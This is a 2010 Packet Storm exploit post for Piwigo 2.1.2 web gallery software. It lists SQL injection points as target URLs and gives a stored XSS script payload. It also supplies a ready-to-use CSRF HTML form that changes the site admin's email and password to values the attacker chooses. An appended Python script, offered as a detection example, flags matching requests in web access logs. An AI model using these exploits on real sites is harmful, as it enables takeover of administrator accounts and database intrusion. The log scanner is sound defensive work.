Piwigo 2.1.2 Cross Site Request Forgery / Cross Site Scripting / SQL Injection

2010-09-11T00:00:00
ID PACKETSTORM:93741
Type packetstorm
Reporter Sweet
Modified 2010-09-11T00:00:00

Description

                                        
                                            `  
  
[+] Site : Inj3ct0r.com  
[+] Support e-mail : submit[at]inj3ct0r.com  
  
######################################  
Sweet the Algerian Haxxor  
######################################  
  
[+] Exploit Title: piwigo-2.1.2 Multiple vulnerabilities  
[+] Date: 11/09/2010  
[+] Author: Sweet  
[+] Contact: charif38@hotmail.fr  
[+] Software Link: http://fr.piwigo.org  
[+] Download: http://fr.piwigo.org/releases/2.1.2  
[+] Version: 2.1.2  
[+] Tested on: WinXp sp3  
[+] Risk: High  
[+] Description: Piwigo is web photo gallery software  
  
  
--=SQL injection=--  
  
  
http://www.target.com/path/comments.php?keyword=charif38@hotmail.fr&author=sweet&cat=1[SQLi]&since=1&sort_by=date&sort_order=DESC&items_number=5  
  
http://www.target.com/path/picture.php?1sweet[SQLi]&action=rate=0  
  
http://www.target.com/path/index.php?/search/10[SQLi]  
  
  
--=Stored XSS=--  
  
Admin login required  
Attack pattern : >'<script>alert("Sweet")</script>  
  
http://www.target.com/path/admin.php?page=tags  
  
The POST variable "Nouveau tag" is vulnerable to a stored XSS attack.  
  
http://www.target.com/path/admin.php?page=cat_list  
  
The POST variable "Ajouter une catégorie virtuelle" is vulnerable to a stored XSS attack.  
  
  
  
--=CSRF=--  
Change admin password exploit  
  
<html>  
<body>  
<h1>Piwigo-2.1.2 Change admin password CSRF </h1>  
<form method="POST" name="form0" action="http://www.target.com/path/admin.php?page=profile&user_id=1">  
<input type="hidden" name="redirect" value="admin.php?page"/>  
<input type="hidden" name="mail_address" value="charif38@hotmail.fr"/> <!-- Your email here -->  
<input type="hidden" name="use_new_pwd" value="sweet"/> <!-- Your password here -->  
<input type="hidden" name="passwordConf" value="sweet"/> <!-- Your password here -->  
<input type="hidden" name="nb_image_line" value="5"/>  
<input type="hidden" name="nb_line_page" value="3"/>  
<input type="hidden" name="theme" value="Sylvia"/>  
<input type="hidden" name="language" value="fr_FR"/>  
<input type="hidden" name="recent_period" value="7"/>  
<input type="hidden" name="expand" value="false"/>  
<input type="hidden" name="show_nb_comments" value="false"/>  
<input type="hidden" name="show_nb_hits" value="false"/>  
<input type="hidden" name="maxwidth" value=""/>  
<input type="hidden" name="maxheight" value=""/>  
<p> Push the Button <input type="submit" name="validate" value="Valider"/> </p>  
</form>  
<form method="GET" name="form1" action="http://www.target.com/path/admin.php?page=user_list">  
<input type="hidden" name="name" value="value"/>   
</form>  
</body>  
</html>  
  
  
[ thx and RIP to Milw0rm.com , JF - Hamst0r - Keystroke you always be right here 3> ] , inj3ct0r.com , exploit-db.com  
  
  
1,2,3 VIVA LALGERIE  
  
`
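
An added detection example, not part of the original advisory: the Python below flags web access-log lines that match the request shapes listed in the SQL injection and CSRF sections. It assumes Combined Log Format, that legitimate `cat` and `/search/` values are plain integers, and a hypothetical site host `gallery.example`; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format: "METHOD target PROTO" status size "referer" ...
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"')
IS_INT = re.compile(r"[0-9]+").fullmatch

def classify(line, site_host):
    """Return a finding label for one access-log line, or None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    try:
        url = urlsplit(m["target"])
        ref_host = urlsplit(m["referer"]).hostname
    except ValueError:  # e.g. malformed IPv6 brackets in client-supplied text
        return "unparseable target or Referer"
    script = url.path.rsplit("/", 1)[-1]
    params = parse_qs(url.query)  # percent-decodes values, drops blank ones
    if script == "comments.php":
        # Assumption: a legitimate cat value is a plain integer id.
        if any(not IS_INT(c) for c in params.get("cat", [])):
            return "comments.php: non-numeric cat"
    elif script == "index.php":
        # Assumption: the token after /search/ is a plain integer id.
        s = re.match(r"/search/([^/&]+)", unquote(url.query))
        if s and not IS_INT(s.group(1)):
            return "index.php: non-numeric search id"
    elif script == "admin.php" and m["method"] == "POST":
        # A profile POST with a missing or foreign Referer fits the CSRF case.
        if params.get("page") == ["profile"] and ref_host != site_host:
            return "admin.php: profile POST without same-site Referer"
    return None

def scan(lines, site_host):
    """Return (line_number, label) for every flagged line."""
    hits = ((n, classify(text, site_host)) for n, text in enumerate(lines, 1))
    return [(n, label) for n, label in hits if label]

SAMPLE = [  # constructed log lines, not taken from a real server
    '192.0.2.7 - - [11/Sep/2010:10:00:01 +0000] "GET /path/comments.php?keyword=&author=&cat=1&since=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [11/Sep/2010:10:00:05 +0000] "GET /path/comments.php?cat=1%27&since=1 HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [11/Sep/2010:10:00:09 +0000] "GET /path/index.php?/search/10%27 HTTP/1.1" 200 298 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [11/Sep/2010:10:02:00 +0000] "POST /path/admin.php?page=profile&user_id=1 HTTP/1.1" 302 0 "http://other.example/p.html" "Mozilla/5.0"',
    '198.51.100.4 - - [11/Sep/2010:10:03:00 +0000] "POST /path/admin.php?page=profile&user_id=1 HTTP/1.1" 302 0 "http://gallery.example/path/admin.php?page=profile&user_id=1" "Mozilla/5.0"',
]
if __name__ == "__main__":
    print(scan(SAMPLE, "gallery.example"))
```

A flagged profile POST is a lead to review alongside later admin logins, not proof of compromise, since some clients strip the Referer header.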